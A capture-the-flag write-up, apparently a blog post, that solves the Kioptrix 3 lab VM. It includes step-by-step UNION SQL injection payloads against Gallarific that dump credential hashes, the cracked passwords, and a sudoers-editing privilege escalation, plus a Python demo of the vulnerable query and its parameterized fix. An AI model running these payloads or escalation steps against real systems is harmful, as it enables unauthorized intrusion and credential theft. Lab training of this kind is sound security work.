
Kioptrix 3

Posted in CTF


Once you have the Kioptrix 3 IP address, make sure to update your hosts file per the setup notes.

After our initial scan we only see two ports open: 22 (SSH, Ubuntu) and 80 (HTTP). Since SSH is a fairly secure service, we can jump right into the web app.

We’ll start by running Nikto in the background while we put on our end-user hat. Clicking links and tabs and viewing source, along with the Nikto findings, we find the following:

  • A possible username of “loneferret”
  • Running CMS called Lotus CMS
  • A photo gallery app called Gallarific.
  • phpmyadmin version 2.11.3.0
  • Apache 2.2.8

After quickly trying a few default credentials to get past the login page, we come up empty (e.g. admin:admin, loneferret:admin, admin:password, etc.). We could always brute force the web form, but first we’ll do some more enumeration.

We can use searchsploit to dig a bit more into the web app. Trying Lotus CMS, phpMyAdmin and Gallarific, we come up with a good hit: a Gallarific SQLi.

SQLi Gallarific

We’ll do this manually to learn a bit more.

We can start by finding the number of columns with “id=1 order by x--”, where x=1,2,3, etc., until you notice an error. When you hit that error you’ll know the number of columns is x-1.

http://kioptrix3.com/gallery/gallery.php?id=1 order by 7--

Here we find the number of columns to be 6, so now we can try this:

http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,2,3,4,5,6--

and we see columns 2 and 3 are vulnerable to a SQL injection.

A quick test shows us the current database and the SQL server version:

http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,database(),version(),4,5,6--

We can list the database tables, find the column names and loot the precious creds:

id=1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--

id=1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=char(100,101,118,95,97,99,99,111,117,110,116,115)

id=1 union select 1,group_concat(username,0x3a,password),3,4,5,6 from dev_accounts
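To see why that last payload works and what the fix looks like, here is an added example (not Gallarific’s code) that reproduces the bug class in Python against an in-memory SQLite table: a lookup that concatenates the id into the query beside one that validates and binds it. The gallery table layout is an assumption, and SQLite’s `||` stands in for the MySQL `0x3a` separator; the dev_accounts rows reuse the hashes found on this box.

```python
import sqlite3

# Constructed sample schema: six-column gallery table (assumed layout) plus the
# dev_accounts table and hashes recovered in the writeup.
SETUP = """
CREATE TABLE gallery (id INTEGER, title TEXT, descr TEXT, c4 TEXT, c5 TEXT, c6 TEXT);
INSERT INTO gallery VALUES (1, 'Summer', 'Holiday photos', 'a', 'b', 'c');
CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
INSERT INTO dev_accounts VALUES (1, 'dreg', '0d3eccfb887aabd50f243b3f155c0f85');
INSERT INTO dev_accounts VALUES (2, 'loneferret', '5badcaf789d3d1d09794d8f021f40f0e');
"""

# The writeup's payload, with SQLite string concatenation instead of MySQL's 0x3a.
PAYLOAD = ("1 union select 1,group_concat(username||':'||password),3,4,5,6 "
           "from dev_accounts--")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SETUP)
    return conn


def fetch_gallery_vulnerable(conn, id_param):
    # Same defect as gallery.php: untrusted input is pasted into the SQL text,
    # so a UNION with a matching column count appends attacker-chosen rows.
    sql = "SELECT * FROM gallery WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def fetch_gallery_fixed(conn, id_param):
    # Hardened form: enforce the expected type, then bind as a parameter so the
    # value can never be parsed as SQL.
    try:
        id_value = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer")
    return conn.execute("SELECT * FROM gallery WHERE id=?", (id_value,)).fetchall()


def leaked_credentials(conn):
    # Returns the credential strings a UNION injection adds to the result set.
    rows = fetch_gallery_vulnerable(conn, PAYLOAD)
    return [r[1] for r in rows if isinstance(r[1], str) and ":" in r[1]]


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", leaked_credentials(db))
    try:
        fetch_gallery_fixed(db, PAYLOAD)
    except ValueError as exc:
        print("fixed:", exc)
```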

Great, now we have some hashed creds, which we’ll crack with hashcat.

dreg:0d3eccfb887aabd50f243b3f155c0f85
loneferret:5badcaf789d3d1d09794d8f021f40f0e

These hashes look like MD5, but use hash-identifier or https://hashcat.net/wiki/doku.php?id=example_hashes to verify.

Hashcat gives a successful output in no time.

5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

We try to SSH with these credentials and get a low-privilege shell as both users, although dreg has a restricted shell, so we’ll use loneferret’s SSH account.

dreg@Kioptrix3:~$ cd /root
-rbash: cd: restricted

PrivEsc

Reading CompanyPolicy.README we get a juicy bit of information about running the “ht” app as root.

To verify this:

sudo -l

This shows we can run ht as root, which lets us edit any file on the system; editing the /etc/sudoers file will be our target.

Running sudo ht /etc/sudoers > ALT + F > Open > /etc/sudoers > change loneferret ALL=(ALL) ALL

Then once saved…

loneferret@Kioptrix3:~$ sudo su
[sudo] password for loneferret: 
root@Kioptrix3:/home/loneferret# cd /root
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt 

Great, we have root.


Lessons learned

  • SQL injection - Great box to test SQLi manually
  • Any creds looted, make sure to try through different open services (mysql creds same as ssh in this case)
  • Target the other installed web apps instead of spending a lot of time on phpMyAdmin; it is a common default web app and often not the weak point.
  • Google and enum the web app for any unknown directories, credentials or version info.
